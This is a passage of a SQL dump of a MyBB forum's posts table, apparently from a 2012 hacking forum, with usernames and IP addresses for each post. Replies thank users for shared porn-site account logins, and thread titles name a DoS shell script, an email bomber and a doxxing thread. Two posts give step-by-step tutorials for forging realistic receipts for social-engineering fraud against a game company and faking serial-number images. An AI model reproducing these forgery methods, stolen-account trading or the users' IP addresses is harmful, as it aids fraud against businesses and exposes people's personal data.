'R?????zo?', '1350724453', 'Nice share bro hahah, can troll friends now :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'af983932101fea7bbc9a3384147f84c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5686', '1005', '5672', '54', 'RE: [20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '0', '62', 'R?????zo?', '1350724515', 'Thanks for sharing this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '10afda3e631bd3996a6dc68afe780846', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5687', '1006', '5676', '54', 'RE: playboy premium acount for lifetime', '0', '62', 'R?????zo?', '1350724549', 'Thanks for sharing this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'dc7f3b88d66cc3a95f413fac0427c9ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5688', '1007', '5678', '54', 'RE: uncommonporn premium acounts', '0', '62', 'R?????zo?', '1350724588', 'Thanks again bro, keep it up.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '94c5a469d020fd08a13c0548b97c1cc2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5689', '1004', '5670', '54', 'RE: [20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '0', '62', 'R?????zo?', '1350724622', 'Thanks for this, +rep you.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e3c0808aa6ad19093b42b47c8686249e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5690', '1001', '5660', '7', 'RE: Shady URL', '0', '258', 'PiXEL^OG', '1350724696', 'Credits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '87872f9ff6e804f9ca601dccfd5fe8d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5691', '896', '4892', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350724867', 'I would like to see that in action, maybe you could make a tutorial about it :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '088d6a52c1fe0670933b56d064c90a3c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5692', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350726592', 'Still works, thanks again :D Bookmarked too!', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'a71789a4563c8ae8aac7bb8a8c1e8e47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5693', '999', '5650', '67', 'RE: [Guide] How To Setup A PHP DoS (Shell) Script', '0', '62', 'R?????zo?', '1350726684', 'Looks interesting, bookmarked to use later, might come handy. Thanks bro, keep it up.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '4849cbd12b0ca8b6e15e4a54c2429cda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5694', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '62', 'R?????zo?', '1350726727', 'Looks nice, thanks for this bro.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e4fd136083df0214d8013235fd0c39e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5695', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350726800', 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com Lol this is the longest mail site :P', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '5abea575cfb21a5412b94a2f685a9bb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5696', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '62', 'R?????zo?', '1350726868', 'Sounds nice, I will check it once I have time. Thanks for this.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'adef487d86b05e889ba70e8e989a644b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5697', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '62', 'R?????zo?', '1350726910', 'Looks legit, thanks bro. Might come handy sometime.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', '15d6d9450145a99f8e2de8ce895e8c61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5698', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350727169', 'Thanks for the updates looks nice, also lol\'ed on the last bonus pic. Btw the DDoS\'ers userbar is broken and forum icon is broken, also we need a clean up on the threads that\'s in there, since they are all related to Rat\'ing.', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'e19087a96ba60762c5d9c1d1152bf93f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5699', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '228', 'VirtualLegend', '1350728052', 'lol NXK Pushed Rave', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5e3d75124d4a919437c754d1e8af3bbd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5700', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1350729581', 'ƒ???????????g.....my username....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f406b2d09678773eef206f10eff85949', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5701', '126', '315', '15', 'RE: Adf.ly Bot', '0', '228', 'VirtualLegend', '1350729988', 'Looks great, and this bot will make you money', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c3222dd66261676547cf7dc2e17744dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5702', '1008', '0', '24', 'Desktop or Lappy?', '0', '205', 'mothered', '1350732548', 'Greetings to all, I couldn\'t find this by title In the search results, so I assume It has yet to be posted. Pretty simple, what do you prefer and Why? Desktop or Laptop? As some of you might be aware, I only deal with lappies, and have quite a few of them. Why? Because of their portability, and compact enough to be carried anywhere around the home, hence can do my computational stuff where ever I\'m situated. Also, their sleek design Is very attractive. You guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4e869d51a69495248083ef0a950c840f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5703', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '205', 'mothered', '1350732798', 'I\'ve used Metasploit via BackTrack many times, and the email harvester does return great results. In some cases though, there are zero results, but most work just fine. Good contribution mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cdac30b6111611cc4e25d5457ea7aa85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5704', '987', '5703', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350735519', '[quote=\'mothered\' pid=\'5703\' dateline=\'1350732798\'] I\'ve used Metasploit via BackTrack many times, and the email harvester does return great results. In some cases though, there are zero results, but most work just fine. Good contribution mate, thanks. [/quote] Your welcome Mothered :) , Try and guess who i am? i know you from UB', '198.144.116.52', '-963611596', '0', '0', '0', '0', '1', '089e62d662482b9dd75fe76edbc0b6ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5705', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350736574', 'lappy all the way because its way more Convenient and just my swag :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7d23937649d244a16cbd0a998d1a0532', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5706', '1008', '5705', '24', 'RE: Desktop or Lappy?', '0', '258', 'PiXEL^OG', '1350736748', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\'] lappy all the way because its way more Convenient and just my swag :) [/quote] lol you don\'t have SWAG :roflol: [spoiler]jk[/spoiler]', '198.144.116.52', '-963611596', '0', '0', '258', '1350736771', '1', '6f446005a3d87c1f3c206be276c42049', '0', '1350736771'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5707', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '62', 'R?????zo?', '1350736814', 'I use desktop for gaming and laptop for work/buisness. Why? Desktop: more comfortable and higher performance to game Laptop: Carry where I want basicly :P', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '85f813557c4cd1633585c21663f5a19a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5708', '1008', '5706', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350737111', '[quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\'] [quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\'] lappy all the way because its way more Convenient and just my swag :) [/quote] lol you don\'t have SWAG :roflol: [spoiler]jk[/spoiler haha your very funny. lol :O)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '21efd5fded1e76c86d9b78c16c1338ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5709', '1008', '5708', '24', 'RE: Desktop or Lappy?', '0', '258', 'PiXEL^OG', '1350737763', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5708\' dateline=\'1350737111\'] [quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\'] [quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\'] lappy all the way because its way more Convenient and just my swag :) [/quote] lol you don\'t have SWAG :roflol: [spoiler]jk[/spoiler haha your very funny. lol :O) [/quote] lol i was joking :)', '198.144.116.52', '-963611596', '0', '0', '0', '0', '1', '991192aab08e59da9bfec148ae66c2a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5710', '1009', '0', '74', 'minecraft server setup tut', '0', '257', 'XxTREYZxX', '1350737882', '[color=#1E90FF]1. go here .https://secure.logmein.com/products/Hamachi/download.aspx 2. Download the unmanaged version. 3. Install it 4. Open it up 5. Set up a new network and call it what you want your server to be called 6. Make password 7. Go here: http://www.minecraft.net/download and download Minecraft_Server.exe 8. Make a new folder on your desktop and place the Minecraft_Server.exe there 9. Editing the properties: Where it says \"server-ip=\" type your IP from Hamachi Where it says \"Gamemode=\" Type 0 for Survival, 1 for Creative, and 2 for Adventure Where it says \"Max Players\" Type how many people you want on your server at once. Where it says \"Difficulty\" Type 1 for Easy, 2 for Normal. and 3 for Hardcore Where it says \"Level Seed\" Type the seed you want for your server Where it says \"Motd\" Type the message you want people to see when connecting to your server Those are the properties that are needed to be edited. The other properties are optional, although seed is optional too. 10.Open Minecraft_Server.exe 11. Let it run, when it says \"Done!\" continue to 12 12. Open Minecraft, click Multiplayer. 13. Type IP address from Hamachi 14. Your server should be running perfectly fine now! thanks hope you enjoy :)[/color]', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '33e9b80218f12799f430db3a25eab08b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5711', '1010', '0', '44', '[TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '62', 'R?????zo?', '1350738603', 'IMPORTANT READ ME! USE CAPITAL LETTER FOR YOUR TEXT IT TURNS OUT A MILLION TIMES BETTER! I decided to make a tutorial on faking these images so here it is! This is my first tutorial and I am not that experienced a photoshop but. Oh well! I did not mention but try to use CAPITAL letter for your text it has a better outcome! Also when doing your lines over the text try and create \"double lines\" have a look in the final image to see what I mean! Requirements: -Photoshop(I use CS6) First off find the product you want then search either youtube or google for reviews on the product such as this(I prefer youtube as it is harder for the companies to find the image) [spoiler][img]http://i45.tinypic.com/34dopzr.png[/img][/spoiler] Then find a video you like and screenshot the image. Once screenshotted put the image into photoshop. [spoiler][img]http://i50.tinypic.com/2hy8ff8.png[/img][/spoiler] When in photoshop add a text box then type in the text you wan\'t to use then curve the text for a better effect with the curve button shown in the image.(It is highlighted in red) Give the image a slight curve but don\'t overdo it. [spoiler][img]http://i48.tinypic.com/2iswdqh.png[/img][/spoiler] Once you have found a curve which fits nicely you now how to find a good handwriting font! Try looking here: http://www.dafont.com/theme.php?cat=603 Once the text is in that font go over it with the brush tool! I recommend using a bigger brush size and extending some of the letters making them more rough. [spoiler][img]http://i47.tinypic.com/ajpb9w.png[/img][/spoiler] Once you think it looks good make sure the layer with your text/brush is selected then go to \"Edit\" then to \"Puppet Warp\" Drag the letters up and down etc. To make it look more like handwriting! Again do it very subtly and don\'t overdo it! Once done click Apply when the box pops up! [spoiler][img]http://i46.tinypic.com/35029nl.png[/img][/spoiler] Now we are nearly there! Click the eraser tool make the brush size about 1/5th the height of the text or smaller. Then go to Opacity and set it to like 25-35% and go over bits of the text (Not all of it only bits!) to texturize it. I recommend zooming in to help. You can go over bits twice but on do this once or twice as it lightens that area dramatically! It should look something like this. [spoiler][img]http://i50.tinypic.com/f374m0.png[/img][/spoiler] Now right click the text/brush layer and go to blending options. Go to \"Drop Shadow\" and set the size to 0 and the spread to like 0-5. Then set the distance so the shadow moves quite far down the page like in my image below. [spoiler][img]http://i48.tinypic.com/25h0cgj.png[/img][/spoiler] Now simply drag your text off the edge of the image so only the shadow is visible then place the shadow where you want to. [spoiler][img]http://i49.tinypic.com/2n8atsj.png[/img][/spoiler] And that is basically it! You just need to mess around with settings a bit to get it perfect! You could try adding a blur to it etc. This is what I got in the end! [spoiler][img]http://i48.tinypic.com/jhsxut.png[/img][/spoiler] Remember use CAPITAL LETTER I really can\'t stress that enough! :L I hope I helped! Credits to: REGISTRAION', '188.140.4.193', '-1131674431', '1', '0', '62', '1350743194', '1', '7f383389a9cc248bfb6df42b3ee6c1aa', '0', '1350743194'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5712', '1008', '5709', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350738763', '[quote=\'XTr3ME PiX3L\' pid=\'5709\' dateline=\'1350737763\'] [quote=\'xEP1C_SC0P3Sx\' pid=\'5708\' dateline=\'1350737111\'] [quote=\'XTr3ME PiX3L\' pid=\'5706\' dateline=\'1350736748\'] [quote=\'xEP1C_SC0P3Sx\' pid=\'5705\' dateline=\'1350736574\'] lappy all the way because its way more Convenient and just my swag :) [/quote] lol you don\'t have SWAG :roflol: [spoiler]jk[/spoiler haha your very funny. lol :O) [/quote] lol i was joking :) [/quote] yeah i realized that when i clicked the spoiler lol :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'f92f313931e95bc2cd58b961215a413a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5713', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '257', 'XxTREYZxX', '1350738989', 'thanks for the great share bud keep up the good work mate :L', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0a77297f24add653167f2cd57ba74add', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5714', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '62', 'R?????zo?', '1350743225', 'Thanks, added spoilers so It\'s better to understand :P', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'bfb981aee308ab2f613abc5f0764a145', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5715', '1011', '0', '44', '[TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350743760', '[align=center]Hi guys, today I am going to show you how I make my fake receipts. This comes in very handy in all sorts of situation when SE\'ing. Btw in this tutorial i am using Paint.NET Note: The receipt shown in the tutorial is what I used for getting Game codes from EA. I think the method is now patched. [size=large][b]Step 1.[/b][/size] [size=medium]The Receipt [/size] Get yourself over to http://www.customreceipt.com/Fill out the form and get your receipt. You will want to find a small company, as the receipts made by the generator are pretty basic, so I go for independent shops in small towns as they are more likely to have the cheap, older tills which produced receipts like these. Once you have found a suitable company use there name and address on the receipt. With a bit of basic MS paint work you can get it looking something like this: [img]http://img839.imageshack.us/img839/8237/receiptz.jpg[/img] [size=large][b]Step 2.[/b][/size] [size=medium]The crinkle\'s[/size] In this stage we add some crinkle to your receipt to make it look like its been in your pocket or wallet. Google \'Crinkled Paper\' and a picture like this will do the job: [img]http://i.istockimg.com/file_thumbview_approve/163282/2/stock-photo-163282-high-res-wrinkled-paper-background.jpg[/img] Crop it down to size and paste it into a new layer above the original receipt You should have something looking like this: [img]http://img848.imageshack.us/img848/2200/91728553.png[/img] Drag the new \'crinkled paper\' image over the whole receipt and then lower the opacity so you can see both images. You should now have something looking like this: [img]http://img171.imageshack.us/img171/3449/25703749.png[/img] [b][size=large]Step 3.[/size][/b] [size=medium]The gradient[/size] I do this stage to make it look like you have scanned the image in, Its entirely up to you whether you choose to do it or now. Create a new layer and click the gradient option, drag from one corner to the other, or from one side to an other. Remember to alter the opacity so you can see the receipt and the crinkle behind it. It should look something like this: [img]http://img847.imageshack.us/img847/6060/85873282.png[/img] Thanks for reading, and I hope this helped you out![/align]', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '3f362c39e484f74def8af3585f78ef9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5716', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350745811', 'NXK pushed Rave. Why? :o What about my demotion? Can you explain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5074d08a36570599a5b3d894480d1eeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5717', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350745857', 'Not working for me :p I didn\'t touch any of em.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4e0f8d1637cf44a3a73ae4aba15ffc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5718', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350745904', 'Doesn\'t work. Image is broken... How much times I gotta say to fix your grammar and spelling? Start with a capital. And capital I etc..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de9cc806583d80bb94d1d0370a76e3ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5719', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350746029', 'Close it then.... Don\'t spam with useless posts please. \"lol i was just about to close it.\" And fix your grammar. I don\'t wanna see any LQ posts on a HQ forum. You\'re causing all of this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df54816ced421364292e4ddbbad168c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5720', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '62', 'R?????zo?', '1350746357', 'yeah does not work :/ someone might changed the password.', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'a42c3b766837a407bb84440d907cb3b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5721', '1012', '0', '16', 'Huge SE Dump', '0', '62', 'R?????zo?', '1350746764', 'Loads of methods inside, have a look. [Spoiler][img]http://i.imgur.com/mbhMR.png[/img][/spoiler] Theres more then this inside, check it out :) Heres the link: http://www.mediafire.com/?1rxgu9g9wicy2oi', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '6def0f3cbabde7df2b561e2f9782caa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5722', '1010', '5711', '44', 'RE: [TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '2', 'Apathy', '1350747050', 'Awesome share thanks man.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5c5c3783d64ef836a33801c0dd6135e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5723', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '2', 'Apathy', '1350747148', 'Why do you guys bother so much? She sleept with a man who was dating someone else. Not cool.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a5ea8410faafd7f9dccaa4944f1e327f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5724', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '2', 'Apathy', '1350747281', 'Not a bad tutorial but looks pretty fake still.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'd54a72600dc6a3142c913acd8f101c1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5725', '1002', '5716', '3', 'RE: New mods and forum updates', '0', '53', 'sirchamp', '1350747297', '[quote=\'iTzIpod\' pid=\'5716\' dateline=\'1350745811\'] NXK pushed Rave. Why? :o What about my demotion? Can you explain? [/quote] He already explained in another thread.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 